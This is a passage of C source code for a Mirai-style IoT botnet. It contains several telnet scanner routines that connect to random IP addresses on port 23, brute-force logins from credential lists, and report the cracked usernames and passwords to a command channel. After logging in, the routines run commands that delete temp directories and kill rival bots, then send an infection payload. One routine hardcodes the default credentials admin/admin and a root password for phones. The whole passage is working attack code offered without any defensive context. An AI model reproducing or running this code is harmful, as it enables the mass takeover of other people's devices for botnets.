1779.                             fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1780.                             advance_telstate(&fds[i], 2);
1781.                         }
1782.                         continue;
1783.                     }
1784.                     else if(res == -1)
1785.                     {
1786.                         reset_telstate(&fds[i]);
1787.                         continue;
1788.                     }
1789.                     if(fds[i].tTimeout + 7 < time(NULL))
1790.                     {
1791.                         reset_telstate(&fds[i]);
1792.                     }
1793.                 }
1794.                 break;
1795.             case 2:
1796.                 {
1797.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1798.                     {
1799.                         fds[i].tTimeout = time(NULL);
1800.                         if(contains_fail(fds[i].sockbuf))
1801.                         {
1802.                             advance_telstate(&fds[i], 0);
1803.                         }
1804.                         else
1805.                         {
1806.                             advance_telstate(&fds[i], 3);
1807.                         }
1808.                         continue;
1809.                     }
1810.                     if(fds[i].tTimeout + 7 < time(NULL))
1811.                     {
1812.                         reset_telstate(&fds[i]);
1813.                     }
1814.                 }
1815.                 break;
1816.             case 3:
1817.                 {
1818.                     if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1819.                     {
1820.                         reset_telstate(&fds[i]);
1821.                         continue;
1822.                     }
1823.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1824.                     {
1825.                         reset_telstate(&fds[i]);
1826.                         continue;
1827.                     }
1828.                     advance_telstate(&fds[i], 4);
1829.                 }
1830.                 break;
1831.             case 4:
1832.                 {
1833.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1834.                     {
1835.                         fds[i].tTimeout = time(NULL);
1836.                         if(contains_fail(fds[i].sockbuf))
1837.                         {
1838.                             advance_telstate(&fds[i], 0);
1839.                         }
1840.                         else
1841.                         {
1842.                             advance_telstate(&fds[i], 5);
1843.                         }
1844.                         continue;
1845.                     }
1846.                     if(fds[i].tTimeout + 7 < time(NULL))
1847.                     {
1848.                         reset_telstate(&fds[i]);
1849.                     }
1850.                 }
1851.                 break;                             
1852.             case 5:
1853.                 {
1854.                     if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1855.                     {
1856.                         reset_telstate(&fds[i]);
1857.                         continue;
1858.                     }
1859.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1860.                     {
1861.                         reset_telstate(&fds[i]);
1862.                         continue;
1863.                     }
1864.                     advance_telstate(&fds[i], 6);
1865.                 }
1866.                 break;                                 
1867.             case 6:
1868.                 {
1869.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
1870.                     {
1871.                         fds[i].tTimeout = time(NULL);
1872.                         if(contains_fail(fds[i].sockbuf))
1873.                         {
1874.                             advance_telstate(&fds[i], 0);
1875.                         }
1876.                         else if(contains_success(fds[i].sockbuf))
1877.                         {
1878.                             if(fds[i].complete == 2)
1879.                             {
1880.                                 advance_telstate(&fds[i], 7);
1881.                             }
1882.                             else
1883.                             {
1884.                                 sockprintf(mainCommSock, "[ TELNET ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1885.                                 sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1886.                                 advance_telstate(&fds[i], 7);
1887.                             }
1888.                         }
1889.                         else
1890.                         {
1891.                             reset_telstate(&fds[i]);
1892.                         }
1893.                         continue;
1894.                     }
1895.                     if(fds[i].tTimeout + 7 < time(NULL))
1896.                     {
1897.                         reset_telstate(&fds[i]);
1898.                     }
1899.                 }
1900.                 break;
1901.             case 7:
1902.             {
1903.                 char RemoveTheTempDirs [80];
1904.                 sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1905.                 if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1906.                 RemoveTempDirs();
1907.                 sockprintf(mainCommSock, "[ TELNET ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1908.                 char killtheproccesses[80];
1909.                 sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1910.                 if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1911.                 sockprintf(mainCommSock, "[ TELNET ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1912.                 advance_telstate(&fds[i], 8);
1913.             }
1914.             break;
1915.             case 8:
1916.                 {
1917.                         fds[i].tTimeout = time(NULL);
1918.                         if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
1919.                         if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
1920.                         if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1921.                         sockprintf(mainCommSock, "[ TELNET ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1922.                         if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
1923.                         {
1924.                             if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
1925.                             {
1926.                                 sockprintf(mainCommSock, "[ TELNET ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1927.                                 fds[i].complete = 3;
1928.                             }
1929.                         }
1930.                         if(fds[i].tTimeout + 10 < time(NULL))
1931.                         {
1932.                             if(fds[i].complete!=3)
1933.                             {
1934.                                 sockprintf(mainCommSock, "[ TELNET ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1935.                             }
1936.                             reset_telstate(&fds[i]);
1937.                         }
1938.                         break;
1939.                 }
1940.             }
1941.         }
1942.     }              
1943. }
1944. void MiraiScanner(int wait_usec, int maxfds){
1945.         int max = getdtablesize() - 100, i, res, num_tmps, j;
1946.         char buf[128], cur_dir;
1947.         if (max > maxfds)
1948.                 max = maxfds;
1949.         fd_set fdset;
1950.         struct timeval tv;
1951.         socklen_t lon;
1952.         int valopt;
1953.         char line[256];
1954.         char* buffer;
1955.         struct sockaddr_in dest_addr;
1956.         dest_addr.sin_family = AF_INET;
1957.         dest_addr.sin_port = htons(23);
1958.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1959.         buffer = malloc(SOCKBUF_SIZE + 1);
1960.         memset(buffer, 0, SOCKBUF_SIZE + 1);
1961.         struct telstate_t fds[max];
1962.         memset(fds, 0, max * (sizeof(int) + 1));
1963.         for(i = 0; i < max; i++) {
1964.                 memset(&(fds[i]), 0, sizeof(struct telstate_t));
1965.                 fds[i].complete = 1;
1966.                 fds[i].sockbuf = buffer;
1967.         }
1968.         while(1) {
1969.                 for(i = 0; i < max; i++) {
1970.                         if(fds[i].tTimeout == 0) {
1971.                                 fds[i].tTimeout = time(NULL);
1972.                         }
1973.                         switch(fds[i].state) {
1974.             case 0:
1975.                 {
1976.                     if(fds[i].complete == 1)
1977.                     {
1978.                         char *tmp = fds[i].sockbuf;
1979.                         memset(&(fds[i]), 0, sizeof(struct telstate_t));
1980.                         fds[i].sockbuf = tmp;
1981.                         fds[i].ip = MiraiIPRanges();
1982.                     }
1983.                     else if(fds[i].complete == 0)
1984.                     {
1985.                         fds[i].usernameInd++;
1986.                         fds[i].passwordInd++;
1987.                         if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
1988.                         {
1989.                             fds[i].complete = 1;
1990.                         }
1991.                         if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
1992.                         {
1993.                             fds[i].complete = 1;
1994.                             continue;
1995.                         }
1996.                     }
1997.                     dest_addr.sin_family = AF_INET;
1998.                     dest_addr.sin_port = htons(23);
1999.                     memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2000.                     dest_addr.sin_addr.s_addr = fds[i].ip;
2001.                     fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2002.                     if(fds[i].fd == -1) continue;
2003.                     fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2004.                     if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
2005.                     {
2006.                         reset_telstate(&fds[i]);
2007.                     }
2008.                     else
2009.                     {
2010.                         advance_telstate(&fds[i], 1);
2011.                     }
2012.                 }
2013.                 break;
2014.             case 1:
2015.                 {
2016.                     FD_ZERO(&fdset);
2017.                     FD_SET(fds[i].fd, &fdset);
2018.                     tv.tv_sec = 0;
2019.                     tv.tv_usec = wait_usec;
2020.                     res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2021.                     if(res == 1)
2022.                     {
2023.                         fds[i].tTimeout = time(NULL);
2024.                         lon = sizeof(int);
2025.                         valopt = 0;
2026.                         getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2027.                         if(valopt)
2028.                         {
2029.                             reset_telstate(&fds[i]);
2030.                         }
2031.                         else
2032.                         {
2033.                             fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2034.                             advance_telstate(&fds[i], 2);
2035.                         }
2036.                         continue;
2037.                     }
2038.                     else if(res == -1)
2039.                     {
2040.                         reset_telstate(&fds[i]);
2041.                         continue;
2042.                     }
2043.                     if(fds[i].tTimeout + 7 < time(NULL))
2044.                     {
2045.                         reset_telstate(&fds[i]);
2046.                     }
2047.                 }
2048.                 break;
2049.             case 2:
2050.                 {
2051.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
2052.                     {
2053.                         fds[i].tTimeout = time(NULL);
2054.                         if(contains_fail(fds[i].sockbuf))
2055.                         {
2056.                             advance_telstate(&fds[i], 0);
2057.                         }
2058.                         else
2059.                         {
2060.                             advance_telstate(&fds[i], 3);
2061.                         }
2062.                         continue;
2063.                     }
2064.                     if(fds[i].tTimeout + 7 < time(NULL))
2065.                     {
2066.                         reset_telstate(&fds[i]);
2067.                     }
2068.                 }
2069.                 break;
2070.             case 3:
2071.                 {
2072.                     if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
2073.                     {
2074.                         reset_telstate(&fds[i]);
2075.                         continue;
2076.                     }
2077.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
2078.                     {
2079.                         reset_telstate(&fds[i]);
2080.                         continue;
2081.                     }
2082.                     advance_telstate(&fds[i], 4);
2083.                 }
2084.                 break;
2085.             case 4:
2086.                 {
2087.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
2088.                     {
2089.                         fds[i].tTimeout = time(NULL);
2090.                         if(contains_fail(fds[i].sockbuf))
2091.                         {
2092.                             advance_telstate(&fds[i], 0);
2093.                         }
2094.                         else
2095.                         {
2096.                             advance_telstate(&fds[i], 5);
2097.                         }
2098.                         continue;
2099.                     }
2100.                     if(fds[i].tTimeout + 7 < time(NULL))
2101.                     {
2102.                         reset_telstate(&fds[i]);
2103.                     }
2104.                 }
2105.                 break;                             
2106.             case 5:
2107.                 {
2108.                     if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
2109.                     {
2110.                         reset_telstate(&fds[i]);
2111.                         continue;
2112.                     }
2113.                     if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
2114.                     {
2115.                         reset_telstate(&fds[i]);
2116.                         continue;
2117.                     }
2118.                     advance_telstate(&fds[i], 6);
2119.                 }
2120.                 break;                                 
2121.             case 6:
2122.                 {
2123.                     if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
2124.                     {
2125.                         fds[i].tTimeout = time(NULL);
2126.                         if(contains_fail(fds[i].sockbuf))
2127.                         {
2128.                             advance_telstate(&fds[i], 0);
2129.                         }
2130.                         else if(contains_success(fds[i].sockbuf))
2131.                         {
2132.                             if(fds[i].complete == 2)
2133.                             {
2134.                                 advance_telstate(&fds[i], 7);
2135.                             }
2136.                             else
2137.                             {
2138.                                 sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2139.                                 sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2140.                                 advance_telstate(&fds[i], 7);
2141.                             }
2142.                         }
2143.                         else
2144.                         {
2145.                             reset_telstate(&fds[i]);
2146.                         }
2147.                         continue;
2148.                     }
2149.                     if(fds[i].tTimeout + 7 < time(NULL))
2150.                     {
2151.                         reset_telstate(&fds[i]);
2152.                     }
2153.                 }
2154.                 break;
2155.             case 7:
2156.                 {
2157.                 char RemoveTheTempDirs [80];
2158.                 sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2159.                 if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2160.                 RemoveTempDirs();
2161.                 sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2162.                 char killtheproccesses[80];
2163.                 sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2164.                 if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2165.                 sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2166.                 advance_telstate(&fds[i], 8);
2167.                 }
2168.                 break;
2169.             case 8:
2170.             {      
2171.                         fds[i].tTimeout = time(NULL);
2172.                         if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
2173.                         if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
2174.                         if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2175.                         sockprintf(mainCommSock, "[ MIRAI ] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2176.                         //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
2177.                         if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
2178.                         {
2179.                             //char  strcasestr (const char *big, const char *little)
2180.                             if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
2181.                             {
2182.                                 sockprintf(mainCommSock, "[ MIRAI ] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2183.                             }
2184.                         }
2185.                         if(fds[i].tTimeout + 60 < time(NULL))
2186.                         {  
2187.                             if(fds[i].complete!=3)
2188.                             {
2189.                                 sockprintf(mainCommSock, "[ MIRAI ] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
2190.                             }
2191.                             reset_telstate(&fds[i]);
2192.                         }
2193.                 break;
2194.                 }
2195.             }
2196.         }
2197.     }              
2198. }
2199. void PhoneScanner() {
2200. int maxfds = 253, i, res, j, valopt;
2201. int max = maxfds;
2202. char buf[128], cur_dir;
2203. fd_set fdset;
2204. struct timeval tv;
2205. socklen_t lon;
2206. srand(time(NULL) ^ rand_cmwc());
2207. char line[253];
2208. char* buffer;
2209. struct sockaddr_in dest_addr;
2210. dest_addr.sin_family = AF_INET;
2211. dest_addr.sin_port = htons(23);
2212. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2213. buffer = malloc(253 + 1);
2214. memset(buffer, 0, 253 + 1);
2215. struct telstate_t fds[max];
2216. memset(fds, 0, max * (sizeof(int) + 1));
2217. for(i = 0; i < max; i++) {
2218. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2219. fds[i].complete = 1;
2220. fds[i].sockbuf = buffer; }
2221. while(1) {
2222. for(i = 0; i < max; i++) {
2223. if(fds[i].tTimeout == 0) {
2224. fds[i].tTimeout = time(NULL); }
2225. switch(fds[i].state) {
2226. case 0: {
2227. if(fds[i].complete == 1) {
2228. char *tmp = fds[i].sockbuf;
2229. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2230. fds[i].sockbuf = tmp;
2231. fds[i].ip = PhoneScan(); }
2232. dest_addr.sin_family = AF_INET;
2233. dest_addr.sin_port = htons(23);
2234. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2235. dest_addr.sin_addr.s_addr = fds[i].ip;
2236. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2237. if(fds[i].fd == -1) continue;
2238. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2239. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2240. sclose(fds[i].fd);
2241. fds[i].complete = 1; }
2242. else {
2243. fds[i].state = 1;
2244. fds[i].tTimeout = 0;
2245. }
2246. }
2247. break;
2248. case 1: {
2249. FD_ZERO(&fdset);
2250. FD_SET(fds[i].fd, &fdset);
2251. tv.tv_sec = 0;
2252. tv.tv_usec = 10000;
2253. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2254. if(res == 1) {
2255. lon = sizeof(int);
2256. valopt = 0;
2257. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2258. if(valopt) {
2259. sclose(fds[i].fd);
2260. fds[i].state = 0;
2261. fds[i].complete = 1;
2262. } else {
2263. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2264. fds[i].tTimeout = 0;
2265. fds[i].bufUsed = 0;
2266. memset(fds[i].sockbuf, 0, 253);
2267. fds[i].state = 2;
2268. } continue; }
2269. else if(res == -1) {
2270. sclose(fds[i].fd);
2271. fds[i].state = 0;
2272. fds[i].complete = 1;
2273. continue; }
2274. if(fds[i].tTimeout + 6 < time(NULL)) {
2275. sclose(fds[i].fd);
2276. fds[i].state = 0;
2277. fds[i].complete = 1;
2278. }
2279. }
2280. break;
2281. case 2: {
2282. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2283. if(contains_fail(fds[i].sockbuf)) {
2284. fds[i].state = 0;
2285. } else {
2286. fds[i].state = 3; }
2287. continue; }
2288. if(fds[i].tTimeout + 6 < time(NULL)) {
2289. fds[i].state = 0;
2290. fds[i].complete = 1;
2291. }
2292. }
2293. break;
2294. case 3: {
2295. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
2296. fds[i].state = 0;
2297. fds[i].complete = 1;
2298. continue; }
2299. fds[i].state = 4;
2300. }
2301. break;
2302. case 4: {
2303. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2304. if(contains_fail(fds[i].sockbuf)) {
2305. fds[i].state = 0;
2306. } else {
2307. fds[i].state = 5; }
2308. continue; }
2309. if(fds[i].tTimeout + 6 < time(NULL)) {
2310. fds[i].state = 0;
2311. fds[i].complete = 1;
2312. }
2313. }
2314. break;
2315. case 5: {
2316. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
2317. fds[i].state = 0;
2318. fds[i].complete = 1;
2319. continue; }
2320. fds[i].state = 6; }
2321. break;
2322. case 6: {
2323. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, advances2)) {
2324. fds[i].tTimeout = time(NULL);
2325. if (contains_fail(fds[i].sockbuf)) {
2326. fds[i].state = 0;
2327. } else {
2328. //sockprintf(mainCommSock, "[ PHONE ] Successfully Bruted. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2329. fds[i].state = 7;
2330. } continue; }
2331. if (fds[i].tTimeout + 7 < time(NULL)) {
2332. fds[i].state = 0;
2333. fds[i].complete = 1;
2334. }
2335. }
2336. break;
2337. case 7: {
2338. char RemoveTheTempDirs [80];
2339. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2340. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2341. RemoveTempDirs();
2342. //sockprintf(mainCommSock, "[ PHONE ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2343. char killtheproccesses[80];
2344. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2345. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2346. //sockprintf(mainCommSock, "[ PHONE ] Bot Killing. || IP: %s || Port: 23 || Username: admin || Password: admin", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2347. if(send(fds[i].fd, "su\r\n", 4, MSG_NOSIGNAL) < 0) {
2348. fds[i].state = 0;
2349. fds[i].complete = 1;
2350. continue; }
2351. fds[i].state = 8;
2352. }
2353. break;
2354. case 8: {
2355. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 253, phone)) {
2356. if(contains_fail(fds[i].sockbuf)) {
2357. fds[i].state = 0;
2358. } else {
2359. fds[i].state = 9; }
2360. continue; }
2361. if(fds[i].tTimeout + 6 < time(NULL)) {
2362. fds[i].state = 0;
2363. fds[i].complete = 1;
2364. }
2365. }
2366. break;
2367. case 9: {
2368. if(send(fds[i].fd, "oelinux123\r\n", 12, MSG_NOSIGNAL) < 0) {
2369. fds[i].state = 0;
2370. fds[i].complete = 1;
2371. continue; }
2372. fds[i].state = 10;
2373. }
2374. break;
2375. case 10: {
2376. fds[i].tTimeout = time(NULL);
2377. if(send(fds[i].fd, phonepayload, strlen(phonepayload), MSG_NOSIGNAL) < 0) {
2378. sclose(fds[i].fd);
2379. fds[i].state = 0;
2380. fds[i].complete = 1;
2381. continue; }
2382. fds[i].complete = 3;
2383. if(fds[i].tTimeout + 60 < time(NULL)) {
2384. if(fds[i].complete !=3){
2385. }
2386. fds[i].state = 0;
2387. fds[i].complete = 1;
2388. }
2389. break;
2390. }
2391. }
2392. }
2393. }
2394. }
2395. void HackaShit() {
2396. char buf[128];
2397.      int max = 256, i, res, valopt;
2398.     fd_set fdset;
2399.     struct timeval tv;
2400.     socklen_t lon;
2401.     srand(time(NULL) ^ rand_cmwc());
2402.     struct sockaddr_in dest_addr;
2403.     dest_addr.sin_family = AF_INET;
2404.     dest_addr.sin_port = htons(23);
2405.     memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2406.     struct telstate_t fds[max];
2407. memset(fds, 0, max * (sizeof(int) + 1));
2408. for(i = 0; i < max; i++) {
2409. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2410. fds[i].complete = 1;
2411. fds[i].sockbuf = malloc(256 + 1); }
2412. while(1) {
2413. for(i = 0; i < max; i++) {
2414. if(fds[i].tTimeout == 0) {
2415. fds[i].tTimeout = time(NULL); }
2416. switch(fds[i].state) {
2417. case 0: {
2418. if(fds[i].complete) {
2419. char *tmp = fds[i].sockbuf;
2420. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2421. fds[i].sockbuf = tmp;
2422. fds[i].ip = findARandomIP(); }
2423. else  {
2424. fds[i].passwordInd++;
2425. fds[i].usernameInd++;
2426. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
2427. fds[i].complete = 1;
2428. continue; }
2429. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
2430. fds[i].complete = 1;
2431. continue;
2432. }
2433. }
2434. dest_addr.sin_family = AF_INET;
2435. dest_addr.sin_port = htons(23);
2436. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2437. dest_addr.sin_addr.s_addr = fds[i].ip;
2438. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2439. if(fds[i].fd == -1) continue;
2440. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2441. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2442. sclose(fds[i].fd);
2443. fds[i].complete = 1; }
2444. else {
2445. fds[i].state = 1;
2446. fds[i].tTimeout = 0;
2447. }
2448. }
2449. break;
2450. case 1: {
2451. FD_ZERO(&fdset);
2452. FD_SET(fds[i].fd, &fdset);
2453. tv.tv_sec = 0;
2454. tv.tv_usec = 10000;
2455. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2456. if(res == 1) {
2457. lon = sizeof(int);
2458. valopt = 0;
2459. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2460. if(valopt) {
2461. sclose(fds[i].fd);
2462. fds[i].state = 0;
2463. fds[i].complete = 1;
2464. } else {
2465. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2466. fds[i].tTimeout = 0;
2467. fds[i].bufUsed = 0;
2468. memset(fds[i].sockbuf, 0, 256);
2469. fds[i].state = 2;
2470. } continue; }
2471. else if(res == -1) {
2472. sclose(fds[i].fd);
2473. fds[i].state = 0;
2474. fds[i].complete = 1;
2475. continue; }
2476. if(fds[i].tTimeout + 6 < time(NULL)) {
2477. sclose(fds[i].fd);
2478. fds[i].state = 0;
2479. fds[i].complete = 1;
2480. }
2481. }
2482. break;
2483. case 2: {
2484. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
2485. if(contains_fail(fds[i].sockbuf)) {
2486. fds[i].state = 0;
2487. } else {
2488. fds[i].state = 3; }
2489. continue; }
2490. if(fds[i].tTimeout + 6 < time(NULL)) {
2491. fds[i].state = 0;
2492. fds[i].complete = 1;
2493. }
2494. }
2495. break;
2496. case 3: {
2497. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
2498. fds[i].state = 0;
2499. fds[i].complete = 1;
2500. continue; }
2501. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2502. fds[i].state = 0;
2503. fds[i].complete = 1;
2504. continue; }
2505. fds[i].state = 4; }
2506. break;
2507. case 4: {
2508. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
2509. {
2510. if(contains_fail(fds[i].sockbuf)) {
2511. fds[i].state = 0;
2512. } else {
2513. fds[i].state = 5; }
2514. continue; }
2515. if(fds[i].tTimeout + 6 < time(NULL)) {
2516. fds[i].state = 0;
2517. fds[i].complete = 1;
2518. }
2519. }
2520. break;
2521. case 5: {
2522. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
2523. fds[i].state = 0;
2524. fds[i].complete = 1;
2525. continue; }
2526. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2527. fds[i].state = 0;
2528. fds[i].complete = 1;
2529. continue; }
2530. fds[i].state = 6;
2531. }
2532. break;
2533. case 6: {
